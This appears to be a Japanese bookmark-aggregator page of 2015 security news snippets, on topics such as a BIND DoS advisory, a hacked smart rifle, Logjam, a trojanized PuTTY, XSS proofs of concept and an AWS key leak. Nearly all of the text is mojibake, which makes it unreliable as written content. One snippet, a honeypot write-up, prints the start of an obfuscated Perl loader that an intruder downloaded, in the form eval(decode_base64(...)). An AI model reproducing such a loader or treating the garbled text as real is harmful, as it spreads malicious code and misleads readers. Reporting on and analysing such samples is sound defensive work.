ã³ãã¥ãã±ã¼ã·ã§ã³ãçã¾ãããã¤ã¼ãã¾ã¨ããã¼ã«
ãã¹ã¯ã¼ãã¤ãzipã®æ·»ä»ã¡ã¼ã«ã¨éµé éåé¡ ããã®ãã¨ã«å±ããããã¢ãªã¹ããã®ã¡ã¼ã«ããã®ã¡ã¼ã«ã«ã¯zipãã¡ã¤ã«ãæ·»ä»ããã¦ãã¦è§£åã«ãã¹ã¯ã¼ããå¿ è¦ã ããã®ãã¹ã¯ã¼ãã¯ãæ·»ä»ãã¡ã¤ã«ã®å¾ãã¢ãªã¹ããå¥ã®ã¡ã¼ã«ã«è¨è¼ããã¦éããã¦ããããã®æé ã«ãããæåã®ã¡ã¼ã«ãã¤ããçè´ããã¨ãã¦ããã¤ãã¯ãã¹ã¯ã¼ããç¥ããªãã®ã§æ·»ä»ãã¡ã¤ã«ãè§£åãããã¨ã¯ã§ããªãã ä¸è¦ããã¨å®å ¨ã«æ å ±ãããã¨ããã¦ããããã«ã¿ãããã®å½¢å¼ã¯ãå®ã¯ã¾ã£ããå®å ¨ã§ã¯ãªãããã¡ã¤ã«ãæ·»ä»ããã¦ããæåã®ã¡ã¼ã«ãçè´ã§ããã®ã§ããã°ãå½ç¶ã¤ãã¯æ¬¡ã«éããããã¹ã¯ã¼ããè¨è¼ãããã¡ã¼ã«ãçè´ã§ããããã ã zipã«æ½ããããã¹ã¯ã¼ãã®å¼·åº¦ã¯ã¨ããããæ°ã«ããªããã¨ã¨ãã¦ããã®æ å ±ã®ããã¨ãã¯æå·ã«ãããã¨ã¦ãéè¦ãªåé¡ããªããããã«ãã¦ãããããã¯éµé éåé¡ã¨å¼ã°ããã æå·ã®ä¸ã«ã¯ãããªãæ©ã段éã§ã絶対ã«è§£èªä¸å¯è½
ã¿ã¼ã²ããã«âã¿ã°ä»ãâããã¨èªåçºç ²ããã©ã¤ãã« 2011å¹´ã«åµæ¥ããTrackingPointã¯ããç´ äººã§ãé·è·é¢ããã¿ã¼ã²ãããæ£ç¢ºã«æã¡æããã¨ãã§ãããèªåç §æºã©ã¤ãã«ãã®éçºã»è²©å£²ã§ãä¸èºæ³¨ç®ãæµ´ã³ãããããä»åããã®ã©ã¤ãã«ã«èªè¨¼ã®å®è£ ä¸åãçºè¦ããããæªç¨ãããå ´åãæ»æè ã¯ã¯Wi-Fiçµç±ã§èªåç §æºã¹ã³ã¼ãã«ã¢ã¯ã»ã¹ããå°æã®ã¿ã¼ã²ãããå¤ãããªã©ã®æä½ãå®è¡ã§ãã¦ãã¾ãã¨ããã ååé¡ãBlack Hat USA 2015ã§çºè¡¨ããã®ã¯ããã¤ã±ã«ã»ã¢ã¦ã¬ã¼æ°ã¨ã«ãã»Aã»ãµã³ãã´ã£ãã¯æ°å¤«å¦»ã ããWhen IoT Attacks: Hacking A Linux-Powered Rifleãã®è¬æ¼ã®ä¸ã§ã両æ°ã¯ãTrackingPoint TP750ãã®è©³ç´°ã調æ»ããã»ãã¥ãªãã£ä¸ã®åé¡ããããã¨ãçªãæ¢ããã¨è©±ããã
--------------------------------------------------------------------- â ï¼ç·æ¥ï¼BIND 9.xã®èå¼±æ§ï¼DNSãµã¼ãã¹ã®åæ¢ï¼ã«ã¤ãã¦ï¼2015å¹´7æ31æ¥æ´æ°ï¼ - ãã«ãªã¾ã«ãã¼ï¼ãã£ãã·ã¥DNSãµã¼ãã¼ï¼ï¼æ¨©å¨DNSãµã¼ãã¼ã®åæ¹ã対象ã ãã¼ã¸ã§ã³ã¢ãããå¼·ãæ¨å¥¨ - æ ªå¼ä¼ç¤¾æ¥æ¬ã¬ã¸ã¹ããªãµã¼ãã¹ï¼JPRSï¼ åç使 2015/07/29ï¼Wedï¼ æçµæ´æ° 2015/07/31ï¼Friï¼ ï¼PoCãå ¬éãããæ¥æ¬å½å ã«ããã¦è¢«å®³äºä¾ãå ±åãããæ¨ã追å ï¼ --------------------------------------------------------------------- â¼æ¦è¦ BIND 9.xã«ãããå®è£ ä¸ã®ä¸å ·åã«ãããnamedã«å¯¾ããå¤é¨ããã®ãµã¼ã ã¹ä¸è½ï¼DoSï¼æ»æãå¯
æ±äº¬ã«ããã¹ãã¼ããã©ã³ã®ã¢ã¯ã»ãµãªã¼ã®è²©å£²ä¼ç¤¾ã®ãµã¼ãã¼ã«ã大éã®ãã¼ã¿ãéãã¤ãããDDï½ï¼³æ»æãã¨ãããµã¤ãã¼æ»æãè¡ããæ¥åã妨害ããã¨ãã¦ããããã 人ã®çå¦çãè¦è¦åºã«é®æããã¾ããã ãDDï½ï¼³æ»æããããã¨ãã¦é®æãããã®ã¯ãå ¨å½ã§åãã¦ã ã¨ãããã¨ã§ãã ããã¾ã§ã®èª¿ã¹ã§ã彿ããã®ä¼ç¤¾ã®ãµã¼ãã¼ã«ã¯é常ã®ãããï¼ï¼åã®è² è·ãããããï¼ãæåã«ããã£ã¦ãã¼ã ãã¼ã¸ãééãããï¼ï¼ï¼ä¸åç¨åº¦ã®æå®³ãåºãã¨ã¿ãããã¨ãããã¨ã§ãã è¦è¦åºã«ããã¾ãã¨ã調ã¹ã«å¯¾ãã°ã¨ã³å®¹çè ã¯ãååã®å£²è²·ãå·¡ã£ã¦ãã©ãã«ããããæ¨ã¿ããã£ã¦ãã£ãããªã©ã¨ä¾è¿°ãã容çãèªãã¦ããã¨ãããã¨ã§ãã è¦è¦åºã¯ãããã¤ã調ã¹ãã¨ã¨ãã«ããDDï½ï¼³æ»æãã«ä½¿ããã½ããã¦ã¨ã¢ãªã©ãã¤ã³ã¿ã¼ãããä¸ãªã©ã§åºåã£ã¦ããã¨ã¿ã¦è¦æãå¼·ãã¦ãã¾ãã
äººã®æ©ãæ¹ãç´°ããåæãã¦æ©ãçãªã©ããå人ãç¹å®ããææ°ã®æè¡ãï¼ï¼æ¥ãæ±äº¬ã»æ±æ±åºã§å ±éé£ã«å ¬éããã¾ããããã®æè¡ã¯äºä»¶ã®ææ»ãªã©ã«å½¹ç«ã¦ããã¨ãè¦å¯ã試é¨çã«æ´»ç¨ãå§ãã¦ãã¾ãã æ©ã人ã®å§¿ãã«ã¡ã©ã§æ®å½±ãããã®éããå§¿å¢ãæã¨è¶³ã®æ¯ãæ¹ãªã©ï¼ã¤ã®é ç®ã«ã¤ãã¦èª¿ã¹ã¦ãæ§å¥ãå¹´é½¢ã ãã§ãªããæ©ãæ¹ã®ç¹å¾´ãç´°ããåæãã¾ããããã¾ã§ã«éãããããï¼ï¼ï¼ï¼äººã®ãã¼ã¿ã§ã¯ãæ©ãæ¹ã詳ããåæãããã¨ã§ï¼ï¼ï¼ 以ä¸ã®ç¢ºçã§å人ãç¹å®ã§ããã»ããæ©ãæ¹ããå¹´é½¢ãæ¨å®ããã¨ãããã¾ã§ã®ã±ã¼ã¹ã§ã¯å®éã¨ã®èª¤å·®ã¯ï¼æ³ç¨åº¦ã ã£ãã¨ãããã¨ã§ãã ãã®æè¡ãæ´»ç¨ããã¨é²ç¯ã«ã¡ã©ã«æ ã£ã人ç©ãç¯äººãªã®ãã©ããçµãè¾¼ããã¨ãã§ããï¼ï¼ã¡ã¼ãã«ã»ã©é¢ãã¦ããã¨ãããæ®å½±ããæ åã§ãè§£æãå¯è½ã ã¨ãããã¨ã§ããå «æ¨æé·ãéçºããæè¡ã«ã¤ãã¦ã¯ãè¦å¯ã試é¨çã«ä½¿ãå§ãã¦ãã¦ãããã¾ã§ã«äºä»¶ã®ç¯äººã鮿ããéè¦ãªæã
䏿£ã¢ã¯ã»ã¹ã観測ããã®ã§ãç´¹ä»ã åç»ãè¦ã¦ããã ããã ãªã«ãã䏿£ãã¡ã¤ã«ãwgetãã¦å®è¡ãããã¨ãã¦ãã Kippoã¯ãä¾µå ¥è ãwgetãããã¡ã¤ã«ããdl ãã£ã¬ã¯ããªã«å ¨ã¦æ ¼ç´ãã¦ãããã®ã§ä»åã¯å®éã«ä¸å¯©ãªãã¡ã¤ã«ã®ä¸èº«ãè¦ã¦ã¿ããã ä¸èº«ãè¦ãã¦ã¿ããencodeããã¦ããã®ã§ãè¦ãç®ã§ã¯ããªã«ããããã®ãªããã¯ããããªãã # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
[ã¬ãã«: ä¸ç´] 常æHTTPSã¸ç§»è¡ããéã«ãå¤é¨ãµã¤ãããå¼µããã¦ãããªã³ã¯ã®URLã https:// ã§å§ã¾ãURLã«ããããæ´æ°ããå¿ è¦ã¯ããã¾ããã Googleã®Gary Illyesï¼ã²ã¤ãªã¼ã»ã¤ãªã¼ãºï¼æ°ã¯ãTwitterã¦ã¼ã¶ã¼ããã®è³ªåã«æ¬¡ã®ããã«çãã¦ãã¾ãã @pip_net if your redirects are properly implemented, the benefit from doing that is so minimal that IMO it's not worth it. â Gary Illyes (@methode) 2015, 7æ 7 HTTPSã¸ç§»è¡ããã¨ããå¯è½ã§ããã°ãéè¦ãªå¤é¨ãªã³ã¯ãSSLã«å¤æ´ããã»ããããã¨æãã¾ããï¼ ãªãã¤ã¬ã¯ããé©åã«å®è£ ããã¦ãããªãããããããã¨ã§ãã©ã¹ã«ãªãã®ã¯ãããããã ãåã®èãã§
2015å¹´7æ1æ¥ãåºç社ã¸ä¸æ£ã¢ã¯ã»ã¹ãè¡ã£ãçãã§17æ³ã®å°å¹´ã鮿ããã¾ãããããã§ã¯é¢é£æ å ±ãã¾ã¨ãã¾ãã 鮿ãããå°å¹´ã«ã¤ã㦠ç¥å¥å·çå·å´å¸ 18æ³*1 ç¡è·ã®å°å¹´ ã¤ã³ã¿ã¼ããããTwitterä¸ã§ã¯ã0chiakiãã¨ãã£ãã¢ã«ã¦ã³ãã§æ´»åãè¡ã£ã¦ããã 容ç 䏿£ã¢ã¯ã»ã¹ç¦æ¢æ³éåã®çã(7æ1æ¥é®æã»7æ16æ¥å¦åä¿ç) 2014å¹´12æã«ä¸æ£ã«åå¾ããIDçãç¨ãã¦æè¡è©è«ç¤¾*2ã®ãµã¼ãã¼ã¸ä¸æ£ã«ã¢ã¯ã»ã¹ãè¡ã£ãçãã*3 容çã«ã¤ãã¦å°å¹´ã¯ãééããªããã¨èªãã¦ããã*4 é»åè¨ç®æ©ä½¿ç¨è©æ¬ºã®çã(7æ17æ¥å鮿) 2015å¹´2æ1æ¥ã«å¤§éªåºï¼ï¼ä»£ç·æ§ã®ã¯ã¬ã¸ããã«ã¼ãæ å ±ãå ¥åããTwitterã§èªåçã«æ å ±åéããã½ããã¦ã§ã¢ããããé販ä¼ç¤¾ããã ã¾ãåã£ãçãã *5 Twitterã§èªåçã«æ å ±åéããã½ããã¦ã§ã¢ã¯ç´ï¼ä¸åã 容çã«ã¤ãã¦ãééããªãã
ããã¼ãå®¶è¨ç°¿ã¢ããªæ¥çããã®ãã¡çµ¶å¯¾ã«ãããäºä»¶ããããã¨äºæ³ãã¾ã â Yusuke OSUMI (@ozuma5119) 2015, 6æ 30 Zaimã®ä»¶ãããããå®¶è¨ç°¿ã¢ããªãã¨ã(ã¨æ¢ãã¦è¨ã)ã«ãéè¡ãã¯ã¬ã«ã®ãã°ã¤ã³ãã¹ã¯ã¼ããå ¥ãã¡ãã人ããããªã«ãããããããã¨ã®æ¹ããã£ã½ã©åé¡ã ã¨æã https://t.co/pidZhtUbej pic.twitter.com/jpNw41MqK0 â Yusuke OSUMI (@ozuma5119) 2015, 6æ 28 Zaimã®ãéèæ©é¢ã®é£æºãæ©è½ãæ°çéè¡ã«ããã£ã¦ã¯æè¨¼çªå·ã¾ã§ããã¥ã©ã«ã«å ¥ãããããã¨ãã¦ããã®ã§ãæ§ããã«è¨ã£ã¦ãã®ã¢ããªã¯é ãããããã¨æã https://t.co/50guysHXIV pic.twitter.com/BQnIaUnfGo â Yusuke OSUMI (@ozuma5119
ãã§ã«å ±éã®ããã«ãããã¯ã«ã¡ã©ã®é販ãµã¤ããããã¯ã«ã¡ã©.comãã«ããã¦ãä¼å¡IDãã¡ã¼ã«ã¢ãã¬ã¹ã«ããã¨ããæ¹ä¿®ããªããã¾ããã徿¥ã¯ä¼å¡ãIDãèªç±ã«ã¤ãããã仿§ã§ããããã£ããä¼å¡ç»é²ãã¦ã¿ãã¨ãããä¼å¡IDã®ã¡ã¼ã«ã¢ãã¬ã¹ã®å ¥åééãã«éãã¦ãå®å ¨æ§ã®é æ ®ã«æãã仿§ã ã¨æããã®ã§ããã¯ã«ã¡ã©ã®ãµãã¼ãã«å ±åããã¨ããã以ä¸ã®ããã«ãã»ãã¥ãªãã£ä¸ã®åé¡ã¨ã¯èªèãã¦ããªããã¨ã®åçã§ããããã®ãããããã«åé¡ç¹ã¨å¯¾çãå ¬éãã¦ãå©ç¨è ã«æ³¨æåèµ·ãããã¾ãã å¹³ç´ ã¯ããã¯ã«ã¡ã©.comããå©ç¨ããã ããèª ã«ãããã¨ããããã¾ãã ãµãã¼ãã»ã³ã¿ã¼æ å½ã®XXXXã¨ç³ãã¾ãã ãã®ç¨ã¯ãåãåããããã ããããã¨ããããã¾ãã è²´éãªãæè¦ãè³ãã¾ãã¦ãèª ã«ãããã¨ããããã¾ãã ä»åãµã¤ãã®ãªãã¥ã¼ã¢ã«ã«é¢ãã¦ãåºæ¬çã«ç¾ç¶ã§ã¯ã»ãã¥ãªãã£ä¸ã®åé¡ãããã¨ã®èªèã¯ãããã¾ããã
éä¿¡ã®å 容ãæå·åããHTTPSæ¥ç¶ã«ä½¿ããã¦ããTLSãããã³ã«ã«ãã¾ãé大ãªèå¼±æ§ãè¦ã¤ãã£ãã3æã«çºè¦ããSSL/TLSå®è£ ã®èå¼±æ§ãFREAKãã«ä¼¼ã¦ããããä»åã®èå¼±æ§ã¯TLSèªä½ã«åå¨ãã主è¦ãªWebãã©ã¦ã¶ãé»åã¡ã¼ã«ãµã¼ããªã©ã«åºç¯ãªå½±é¿ãåã¶ã¨ããã ä»åçºè¦ããèå¼±æ§ã¯ãLogjamãã¨å½åããã解説ãµã¤ããå ¬éããããããã«ããã¨ãTLSã§ã»ãã¥ã¢ãªæ¥ç¶ã確ç«ããããã®æå·ã¢ãªã´ãªãºã ãDiffie-Hellmanï¼DHï¼éµäº¤æãã«èå¼±æ§ããããåã¢ã«ã´ãªãºã ã¯HTTPSãSSHãIPsecãSMTPSãªã©å¤æ°ã®ãããã³ã«ã«ä½¿ããã¦ããã ãã®èå¼±æ§ãæªç¨ãããå ´åãéä¿¡ã«å²ãè¾¼ãä¸éè æ»æã仿ãã¦TLSæ¥ç¶ã512ãããã®è¼¸åºã°ã¬ã¼ãæå·ã«æ ¼ä¸ããããéä¿¡ã®å å®¹ãæ»æè ãååãããæ¹ããããããããã¨ãå¯è½ã¨ãããã èå¼±æ§ã¯ãDHE_EXPORTãã®æå·ã¹ã¤ã¼
å°å·ãã ã¡ã¼ã«ã§éã ããã¹ã HTML é»åæ¸ç± PDF ãã¦ã³ãã¼ã ããã¹ã é»åæ¸ç± PDF ã¯ãªããããè¨äºãMyãã¼ã¸ããèªããã¨ãã§ãã¾ã æ å ±ãçãããã¤ã®æ¨é¦¬ãå«ã¾ãããã¼ã¸ã§ã³ã®ãªã¼ãã³ã½ããã¦ã§ã¢ãPuttyãã®ã¯ã©ã¤ã¢ã³ããåºåã£ã¦ãããã¨ãæããã«ãªã£ãã Symantecã®ç ç©¶è ã«ããã°ãéçºè ã®ãã©ã¤ãã·ã¼ãå®å ¨æ§ã侵害ããå¯è½æ§ã®ããããªã¼ãã³ã½ã¼ã¹SSHã¯ã©ã¤ã¢ã³ãPuTTYã®éå ¬å¼ãã¼ã¸ã§ã³ãé å¸ãããäºä¾ãè¦ã¤ãã£ã¦ããã Simon Tathamæ°ãéçºããPuTTYã¯ãä¸çä¸ã®ã¦ã§ãéçºè ã管çè ãITã¹ã¿ããã«å©ç¨ããã¦ããããã®ã¯ã©ã¤ã¢ã³ãã¯åèª¿ä½æ¥ãITããã¸ã§ã¯ãã®ä½æ¥ã§ä½¿ããã¦ãããæå·åãããæ¥ç¶ãéãã¦ãªã¢ã¼ããµã¼ãã«æ¥ç¶ããã®ã«ä½¿ç¨ãããã ããããä»åã¯PuTTYã®ãªã¼ãã³ã½ã¼ã¹ã§ããã¨ããæ§è³ªãæªç¨ãããã ããã¤ã®æ¨é¦¬ãã¼ã¸
2015/4/16(æ¨)ï¼ãã¼ã¸ã®ä¸çªä¸ã«è¿½è¨ãè¨è¿°ãã¾ããã ãã®æããªãã¨ããã£ã³ãã¨ããã»ãã¥ãªãã£ã®ã¤ãã³ãã«åå ããæãã¢ã¦ããããã大äºãã¨è¨ãããã®ãæãåºãã¾ããã ã§ããæ®éèªåã®è¦ã¤ããç¥èã¯å¾ç大äºã«æ±ãã¦ããããããã ã¨æãã¾ãã ããã§ä»åã¯ãããã£ãä½ãããã¼ããªããã®ãæ¨ã¦ãã¹ããæºãè¾¼ãã è²ããªXSSã®PoCãå°ãæ¸ãåºãã¦ã¾ã¨ãã¾ããã ä»ã¾ã§èªåã§è¦ã¤ãããã®ãæµ·å¤ã®Security Researcheréããåéãããã®ãããã¾ãã ãã¦ãä»åãªã¹ãã¢ããããPoCã®è¦æ¹ã§ããããã¤ãã®é ç®ãããã¾ãã ä¸çªä¸ã®ãææ³ãã¯ã¿ã¤ãã«ã¿ãããªãã®ã ã¨æã£ã¦ä¸ããã äºçªç®ã®ãPoCãã¯ã¹ã¯ãªãããå®è¡ããçºã®ã³ã¼ãã§ããæ®ã©ãã¢ã©ã¼ããåºãã ãã®ã¹ã¯ãªããã®çºå±éºãªã³ã¼ãã¯ç¡ãã¤ããã§ãããèªåã®ãã©ã¦ã¶ã§å®è¡ããéã¯èªå·±è²¬ä»»ã§ãé¡ããã¾ãããªã³ã¯ãã¯ãªã
æ ããªã話ã§ãããèªåã®å¤§ãã§ã³ãã§ AWS ã®å人ã¢ã«ã¦ã³ãã第ä¸è ã«ã¢ã¯ã»ã¹ãããçµæ 190ä¸åç¸å½ã®ãªã½ã¼ã¹ã使ãããæçµçã« AWS ããã«å é¤ãé ãã¾ãããåçè¾¼ã¿ã§æ¬ä»¶ã®ã¾ã¨ããæ¸ãã¾ãã èªåã馬鹿ãå¹¾ã¤ãéããçµæã§ãã£ã¦ãAWS èªä½ã¯æããªãã¨ããã®ãä¼ããã°å¹¸ãã§ã ã¯ããã«ã¾ã¨ã S3 å®é¨ãã¦ãæã« SECRET KEY ãè¦ããå ´æã«è²¼ã£ã¦ããäºãããã第ä¸è ãããã§ã¢ã¯ã»ã¹ã大éã®é«æ§è½ã¤ã³ã¹ã¿ã³ã¹ãå ¨åã§åã (æããBitCoinæ¡æ) AWS ãããã䏿£ã¢ã¯ã»ã¹ã®é£çµ¡ããããæ¥ãã§ ACCESS KEY ç¡å¹ï¼ãã¹ã¯ã¼ã夿´ãã¤ã³ã¹ã¿ã³ã¹å ¨åæ¢ãã¤ã¡ã¼ã¸åé¤ããããã¯ã¼ã¯åé¤ å é¤ã®æ¿èªãã§ã¼ãºãé²ãã¦ãã¯ã¬ã¸ããã«ã¼ãã®å¼ãè½ã¨ãåã«å®äºãã¦å©ãã AWS ããã®ãµãã¼ã AWS ããã¯æå¤§éãµãã¼ããã¦ããã¾ãã æ¿èªãã§ã¼ãºãé²ã¾ãªãæããã¾ã
ã©ã³ãã³ã°
ã©ã³ãã³ã°
ã¡ã³ããã³ã¹
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}